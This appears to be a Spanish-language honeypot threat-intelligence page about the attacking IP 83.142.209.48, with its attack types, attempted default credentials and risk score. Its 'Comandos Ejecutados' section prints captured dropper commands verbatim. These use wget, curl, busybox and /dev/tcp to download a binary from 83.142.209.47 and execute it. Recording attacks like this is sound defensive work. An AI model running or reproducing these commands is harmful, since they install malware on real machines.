Amenaza Activa • CRITICO
83.142.209.48
Pais de Origen🇳🇱 Paises Bajos
Primera Deteccion2/3/2026
Ultima Actividad30/3/2026
ISPGhosty Networks LLC
🎯
53
Ataques Totales
🔌
6
Puertos
📡
7
Tipos Ataque
🦠
4
Malware
Geolocalizacion
- Pais
- 🇳🇱 Paises Bajos
- Ciudad
- Desconocida
- ASN
- AS205759
- ISP
- Ghosty Networks LLC
Tipos de Ataque
ssh_telnet_honeypot
yaml_exploit_honeypot
redis_honeypot
adb_honeypot
malware_capture
web_honeypot
tcp_trap
Puertos Atacados
238081237555556379
Malware Asociado
Credenciales Intentadas
🔐root/root
2x🔐admin/admin
2xComandos Ejecutados
$
uname -m11x$
admin2x$
password2x$
cd /tmp;s=%s;p=%d;wget -q http://$s:$p/$(uname -m) -O .x&&chmod +x .x&&./.x||curl -so .x http://$s:$p/$(uname -m)&&chmod +x .x&&./.x||busybox wget http://$s:$p/$(uname -m) -O .x&&chmod +x .x&&./.x||wget -q http://$s:$p/dlr.$(uname -m) -O dlr&&chmod +x dlr&&./dlr||curl -so dlr http://$s:$p/dlr.$(uname -m)&&chmod +x dlr&&./dlr1x$
exec 3 <> /dev/tcp/83.142.209.47/801x$
while read l <& 31x$
/tmp/dlr1x$
cd /tmp;wget -q http://83.142.209.47:80/$(uname -m) -O .x && chmod +x .x && ./.x || curl -so .x http://83.142.209.47:80/$(uname -m) && chmod +x .x && ./.x || busybox wget http://83.142.209.47:80/$(uname -m) -O .x && chmod +x .x && ./.x || wget -q http://83.142.209.47:80/dlr.$(uname -m) -O dlr && chmod +x dlr && ./dlr || curl -so dlr http://83.142.209.47:80/dlr.$(uname -m) && chmod +x dlr && ./dlr1x$
exec 3<>/dev/tcp/83.142.209.47/80;echo -ne 'GET /dlr.'$(uname -m)' HTTP/1.0\r\n\r\n'>&3;while read l<&3;do [ -z "$l" ]&&break;done;cat<&3>/tmp/dlr;chmod +x /tmp/dlr;/tmp/dlr1x$
break1xExposicion segun Shodan InternetDBShodan
Datos de InternetDB, actualizacion no en tiempo real
Puertos
226881
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linux
Evaluacion de Riesgo
80
/100
BajoMedioAltoCritico